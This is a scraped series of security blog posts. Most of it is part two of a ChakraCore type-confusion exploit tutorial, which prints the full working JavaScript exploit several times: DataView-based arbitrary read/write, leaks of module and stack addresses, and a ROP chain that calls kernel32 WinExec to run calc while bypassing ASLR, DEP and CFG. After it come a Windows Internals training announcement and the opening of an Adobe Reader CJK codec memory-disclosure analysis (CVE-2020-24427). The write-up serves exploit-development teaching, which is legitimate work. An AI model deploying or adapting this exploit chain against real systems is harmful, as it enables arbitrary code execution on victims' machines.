0x18003e876: pop rax ; ret ; \x26\x58\xc3 (1 found)
0x18003e6c6: pop rcx ; ret ; \x26\x59\xc3 (1 found)
0x1800d7ff7: mov qword [rcx], rax ; ret ; \x48\x89\x01\xc3 (1 found)

Here is how this will look in terms of our ROP chain:

pop rax ; ret
<0x636c6163> (calc in hex is placed into RAX)

pop rcx ; ret
<pointer to store calc> (pointer is placed into RCX)

mov qword [rcx], rax ; ret (fill pointer with calc)

Where we have currently overwritten our return address with a value of 0x4141414141414141, we will place our first ROP gadget of pop rax ; ret there to begin our ROP chain. We will then write the rest of our gadgets down the rest of the stack, where our ROP payload will be executed.

Our previous three ROP gadgets will place the string calc into RAX, place the pointer where we want to write this string into RCX, and then write the string to the memory that pointer references.
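Writing a chain "down the stack" is just a sequence of 8-byte writes at increasing addresses. A minimal sketch of that bookkeeping, assuming a write64(lo, hi, valLo, valHi) primitive shaped like the one in this post, is shown below. writeChain and the recording stub are hypothetical and exist only to show the slot arithmetic; the sketch also assumes the low half of the address does not wrap while writing.

```javascript
// Hypothetical helper: write [low32, high32] entries to consecutive 8-byte slots.
// Assumes startLo + offset never exceeds 0xffffffff (no carry into the high half).
function writeChain(write64, startLo, startHi, entries) {
    let offset = 0;
    for (const [valLo, valHi] of entries) {
        write64((startLo + offset) >>> 0, startHi, valLo >>> 0, valHi >>> 0);
        offset += 8; // each entry occupies one 64-bit stack slot
    }
    return offset;   // number of bytes written
}

// Recording stub used for demonstration instead of a real write primitive
const written = [];
const recordWrite = (lo, hi, valLo, valHi) => written.push([lo, hi, valLo, valHi]);

const chainSize = writeChain(recordWrite, 0x2000, 0x7ff0, [
    [0x1003e876, 0x7ffa],   // placeholder entry standing in for a gadget address
    [0x636c6163, 0x0],      // the value that gadget would pop
]);
```

The scripts in this post do the same thing by hand with counter += 0x8 after every write64 call.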

Let’s update our exploit.js script with these ROP gadgets (note that rp++ can’t compensate for ASLR, and essentially computes the offset from the base of chakracore.dll. For example, the pop rax gadget is shown to be at 0x18003e876. What this means is that we can actually find this gadget at chakracore_base + 0x3e876.)

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;

}

main();
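The offset arithmetic mentioned before the listing above (0x18003e876 becoming chakracore_base + 0x3e876) can be sketched as follows. This is an offline helper meant to be run outside the exploit, for example in Node.js, since it relies on BigInt. RP_IMAGE_BASE and rebaseGadget are hypothetical names, the image base 0x180000000 is inferred from the example in this post, and the module base passed in below is a made-up value for demonstration.

```javascript
// Assumption: rp++ printed addresses relative to this preferred image base
const RP_IMAGE_BASE = 0x180000000n;

// Hypothetical helper: turn an rp++ address into [low32, high32] for a leaked module base
function rebaseGadget(rpAddress, baseLo, baseHi) {
    const offset = BigInt(rpAddress) - RP_IMAGE_BASE;
    const base = (BigInt(baseHi >>> 0) << 32n) | BigInt(baseLo >>> 0);
    const absolute = base + offset;
    return [Number(absolute & 0xffffffffn), Number(absolute >> 32n)];
}

// Demonstration with a made-up module base of 0x00007ffa10000000
const popRax = rebaseGadget(0x18003e876n, 0x10000000, 0x7ffa);
console.log("0x" + popRax[1].toString(16) + popRax[0].toString(16).padStart(8, "0"));
```

Inside exploit.js the same result is obtained by adding the bare offset to chakraLo, which works as long as the addition does not overflow the low 32 bits.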

You’ll notice the address we are placing in RCX, via pop rcx, is “an empty address in .data of chakracore.dll”. The .data section of any PE is generally readable and writable. This gives us the proper permissions needed to write calc into the pointer. To find this address, we can look at the .data section of chakracore.dll in WinDbg with the !dh command.

Let’s run our exploit.js in WinDbg again via ch.exe and set a breakpoint on our first ROP gadget (located at chakracore_base + 0x3e876) to step through execution.

Looking at the stack, we can see we are currently executing our ROP chain.

Our first ROP gadget, pop rax, will place calc (in hex representation) into the RAX register.

After execution, we can see the ret from our ROP gadget takes us right to our next gadget - pop rcx, which will place the empty .data pointer from chakracore.dll into RCX.

This brings us to our next ROP gadget, the mov qword ptr [rcx], rax ; ret gadget.

After execution of the ROP gadget, we can see the .data pointer now contains the contents of calc - meaning we now have a pointer we can place in RCX (it technically is already in RCX) as the lpCmdLine parameter.

Now that the first parameter is done - we only have two more steps left. The first is the second parameter, uCmdShow (which just needs to be set to 0). The last gadget will pop the address of kernel32!WinExec. Here is how this part of the ROP chain will look.

pop rdx ; ret
<0 as the second parameter> (placed into RDX)

pop rax ; ret
<WinExec address> (placed into RAX)

jmp rax (call kernel32!WinExec)

The above gadgets will fill RDX with our last parameter, and then place WinExec into RAX. Here is how we update our final script.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x180040802: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18007be3e: jmp rax
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
}

main();

Before execution, we can find the address of kernel32!WinExec by computing the offset in WinDbg.

Let’s again run our exploit in WinDbg and set a breakpoint on the pop rdx ROP gadget (located at chakracore_base + 0x40802).

After the pop rdx gadget is hit, we can see 0 is placed in RDX.

Execution then redirects to the pop rax gadget.

We then place kernel32!WinExec into RAX and execute the jmp rax gadget to jump into the WinExec function call. We can also see our parameters are correct (RCX points to calc and RDX is 0).

We can now see everything is in order. Let’s close out of WinDbg and execute our final exploit without any debugger. The final code can be seen below.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4-byte values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (whose base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (located at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext (located at scriptContext+0x3b8)
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x180040802: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18007be3e: jmp rax
    counter+=0x8;
}

main();

As we can see, we achieved code execution via type confusion while bypassing ASLR, DEP, and CFG!

Conclusion

As we saw in part two, we took our proof-of-concept crash exploit to a working exploit to gain code execution while avoiding exploit mitigations like ASLR, DEP, and Control Flow Guard. However, we are only executing our exploit in the ChakraCore shell environment. When we port our exploit to Edge in part three, we will need to use several ROP chains (upwards of 11 ROP chains) to get around Arbitrary Code Guard (ACG).

I will see you in part three! Until then.

Peace, love, and positivity :-)

Registration is open for the Windows Internals training

16 March 2022 at 13:13

My schedule has been a mess in recent months, and continues to be so for the next few months. However, I am opening registration today for the Windows Internals training with some date changes from my initial plan.

Here are the dates and times (all based on London time) – 5 days total:

  • July 6: 4pm to 12am (full day)
  • July 7: 4pm to 8pm
  • July 11: 4pm to 12am (full day)
  • July 12, 13, 14, 18, 19: 4pm to 8pm

Training cost is 800 USD, if paid by an individual, or 1500 USD if paid by a company. Participants from Ukraine (please provide some proof) are welcome with a 90% discount (paying 80 USD, individual payments only).

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone. The basic syllabus can be found here. If you’ve sent me an email before when I posted about my upcoming classes, you don’t have to do that again – I will send full details soon.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

zodiacon

CVE-2020-24427: Adobe Reader CJK Codecs Memory Disclosure Vulnerability

15 March 2022 at 08:36

Overview

Over the past year, the team spent some time looking into Adobe Acrobat. Multiple vulnerabilities were found with varying criticality. A lot of them are worth talking about. There's one specific interesting vulnerability that's worth detailing in public.

Back in 2020, the team found an interesting vulnerability that affected Adobe Reader (2020.009.20074). The bug existed while handling CJK codecs that are used to decode Japanese, Chinese and Korean scripts, namely: Shift JIS, Big5, GBK and UHC. The bug was caused by an unexpected program state during the CJK to UCS-2/UTF-16 decoding process. In this short blog, we will discuss the bug and study one execution path where it was leveraged to disclose memory to leak JavaScript object addresses and bypass ASLR.

1. BACKGROUND

Before diving into details, let us see a typical use of the functions streamFromString() and stringFromStream() to encode and decode strings:

The function stringFromStream() expects a ReadStream object obtained by a call to streamFromString(). This object is implemented natively in C/C++. It is quite common for clients of native objects to expect certain behavior and overlook unexpected cases. We tried to see what would happen when stringFromStream() receives an object that satisfies the ReadStream interface but behaves unexpectedly, for example by returning invalid data that can’t be decoded back using Shift JIS, and this is how the bug was initially discovered.
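As an illustration of what "an object that satisfies the ReadStream interface" could look like, here is a minimal sketch. It is not the original proof of concept. makeBadStream is a hypothetical name, and the sketch assumes that read() returns hex-encoded bytes, that an empty string signals the end of the stream, and that "Shift-JIS" is the charset name accepted by util.stringFromStream(). The final call only runs inside Acrobat's JavaScript engine, where the util object exists.

```javascript
// Hypothetical stream object: read() is assumed to return hex-encoded bytes,
// and an empty string is assumed to signal the end of the stream.
function makeBadStream(hexBytes) {
    let consumed = false;
    return {
        read: function (nBytes) {
            if (consumed) {
                return "";
            }
            consumed = true;
            return hexBytes;
        }
    };
}

// 0xfc 0x23 is not a valid Shift JIS byte sequence
const badStream = makeBadStream("fc23");

// Only meaningful inside Acrobat's JavaScript engine; skipped everywhere else
if (typeof util !== "undefined" && typeof util.stringFromStream === "function") {
    console.println(util.stringFromStream(badStream, "Shift-JIS"));
}
```

Outside Acrobat the sketch only constructs the object, which is enough to see that nothing in JavaScript forces read() to return data that is valid for the requested encoding.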

2. PROOF OF CONCEPT

The following JavaScript proof of concept demonstrates the bug:

It passes an object with a read() method to stringFromStream(). This method returns an invalid Shift JIS byte sequence which begins with the bytes 0xfc and 0x23. After running the code, some random memory data was dumped to the debug console, which may include some recognizable strings (the output will differ on different machines):

Surprisingly, this bug does not trigger an access violation or crash the process; we will see why. Perhaps one useful heuristic to automatically detect such bugs is to measure the entropy of the function output. Typically, the output entropy will be high if we pass input with high entropy. An output with low entropy could be an indication of a memory disclosure.
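The entropy heuristic can be sketched with a plain Shannon entropy calculation over the returned string. This is a minimal illustration, not the tooling the team used. shannonEntropy is a hypothetical helper, and what counts as "low" or "high" would need to be calibrated against real outputs.

```javascript
// Shannon entropy in bits per symbol, computed over the UTF-16 code units of a string
function shannonEntropy(text) {
    if (text.length === 0) {
        return 0;
    }
    // Count how often each code unit occurs
    const counts = new Map();
    for (let i = 0; i < text.length; i++) {
        const unit = text.charCodeAt(i);
        counts.set(unit, (counts.get(unit) || 0) + 1);
    }
    // Sum -p * log2(p) over all observed code units
    let entropy = 0;
    for (const count of counts.values()) {
        const p = count / text.length;
        entropy -= p * Math.log2(p);
    }
    return entropy;
}

const uniformSample = shannonEntropy("abcd");   // every symbol distinct
const repeatedSample = shannonEntropy("aaaa");  // a single repeated symbol
```

A fuzzer could compare the entropy of the decoded output against that of the random input it supplied and flag cases where the two diverge sharply.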


3. ROOT CAUSE ANALYSIS

In order to find the root of the bug, we will trace the call of stringFromStream(), which is implemented natively in the EScript.api plugin. This is the decompiled pseudocode of the function:

This function decodes the hex string returned by ReadStream’s read() and checks whether the encoding is a CJK encoding or one of several single-byte encodings such as Windows-1256 (Arabic). It then creates an ASText object from the encoded string using ASTextFromSizedScriptText(). The exact layout of the ASText object is undocumented and we had to reverse engineer it:

The u_str field is a pointer to a Unicode UCS-2/UTF-16 encoded string, and mb_str stores the non-Unicode encoded string. ASTextFromSizedScriptText() initializes mb_str. The string mb_str points to is lazily converted to u_str only if needed.

It is worth noting that ASTextFromSizedScriptText() does not validate the encoded data apart from looking for the end of the string by locating the null byte. This works fine because 0x00 maps to the same codepoint in all the supported encodings, as they are all supersets of ASCII and no multibyte codepoint uses 0x00.
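The claim about the null byte is easy to check against Python's own codec tables. The sketch below uses Python codec names as stand-ins for the four encodings (cp949 is Python's name for UHC). These are Python's tables, not Adobe's, and sized_length() is a hypothetical helper that only mimics the "scan for the first null byte" behavior described above.

```python
# Python codec names standing in for the encodings named in the post.
CJK_CODECS = {"Shift JIS": "shift_jis", "Big5": "big5", "GBK": "gbk", "UHC": "cp949"}


def nul_is_ascii_nul(codec: str) -> bool:
    """True if the single byte 0x00 decodes to U+0000 under the given codec."""
    return b"\x00".decode(codec) == "\x00"


def sized_length(buf: bytes) -> int:
    """Length up to the first null byte, with no validation of what precedes it."""
    end = buf.find(b"\x00")
    return len(buf) if end == -1 else end


results = {name: nul_is_ascii_nul(codec) for name, codec in CJK_CODECS.items()}
```

Note that sized_length() happily accepts the invalid prefix 0xfc 0x23, which is exactly why malformed data reaches the decoder later on.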

Once the ASText object is created, it is passed to create_JSValue_from_ASText() which converts the ASText object to SpiderMonkey’s string JSValue to pass it to JavaScript:

The function ASTextGetUnicode(), implemented in AcroRd32.dll, lazily converts mb_str to u_str if u_str is NULL and then returns the value of u_str:

The function we named convert_mb_to_unicode() is where the conversion happens. It is referenced by many functions to perform the lazy conversion:

The initial call to Host2UCS() computes the size of the buffer required to perform the decoding. Then, it allocates memory, calls Host2UCS() again for the actual decoding and terminates the decoded string. The function change_u_endianness() swaps the byte order of the decoded data. We need to keep this in mind for exploitation.
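The size-then-decode pattern and the byte swap can be modeled in Python as follows. This is a sketch under assumptions, not the decompiled code: Python codecs stand in for Host2UCS(), all function names are hypothetical, and the swap direction (little-endian to big-endian) is assumed because the text does not state it.

```python
def required_size(mb: bytes, codec: str) -> int:
    """Pass 1: number of bytes the UTF-16 output needs (terminator excluded)."""
    return len(mb.decode(codec).encode("utf-16-le"))


def decode_into(mb: bytes, codec: str, out: bytearray) -> int:
    """Pass 2: decode into the caller's buffer and return the bytes written."""
    encoded = mb.decode(codec).encode("utf-16-le")
    out[:len(encoded)] = encoded
    return len(encoded)


def swap_byte_order(buf: bytearray, size: int) -> None:
    """Swap the two bytes of each 16-bit code unit in place."""
    for i in range(0, size - 1, 2):
        buf[i], buf[i + 1] = buf[i + 1], buf[i]


def convert(mb: bytes, codec: str) -> bytes:
    size = required_size(mb, codec)
    buf = bytearray(size + 2)               # room for a 16-bit terminator
    written = decode_into(mb, codec, buf)
    swap_byte_order(buf, written)
    buf[written:written + 2] = b"\x00\x00"  # terminate the decoded string
    return bytes(buf)
```

For an exploit, the swap matters because any bytes read back through the JavaScript string arrive with each 16-bit unit reversed relative to memory.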

The initial call to Host2UCS() computes the size of the buffer needed for decoding:

